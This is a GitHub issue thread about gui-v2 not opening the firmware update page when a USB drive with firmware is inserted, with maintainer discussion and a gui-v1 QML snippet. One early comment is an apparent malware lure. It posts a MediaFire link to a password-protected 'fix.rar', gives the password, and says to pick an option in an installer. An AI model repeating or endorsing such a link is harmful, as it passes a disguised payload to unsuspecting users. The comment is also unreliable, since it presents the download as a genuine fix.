victronenergy/gui-v2 #1427: Inserting usb drive with firmware does not show firmware update page

blammit, 2024-08-27:
In gui-v1, inserting a usb drive with a firmware image will cause the firmware update page to appear. Also if you remove the usb drive without ejecting, an error notification is shown. This does not occur with gui-v2.

amir1387aht, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

DanielMcInnes, 2024-09-04:
I think gui-v1 does this via `StorageEventsDbus::vrmExternalStorageError(...)`, and this code in `main.qml`. 

```
	// Note: finding a firmware image on the storage device is error 4 for vrm storage
	// since it should not be used for logging. That fact is used here to determine if
	// there is a firmware image.
	Connections {
		target: storageEvents
		onVrmStorageError: {
			if (error === 4) {
				setTopPage(offlineFwUpdates)
			}
		}
	}

```
I think gui-v2 will need platform support to handle this. Marking as blocked for now.

mpvader, 2024-09-05:
Jeroen will work on this, with priority.

mpvader, 2024-09-05:
and, I've changed the prio from medium to low, since we will not block gui-v2 official release over this.

ReinvdZee, 2026-09-10:
@DanielMcInnes Please test to see if this is still the case.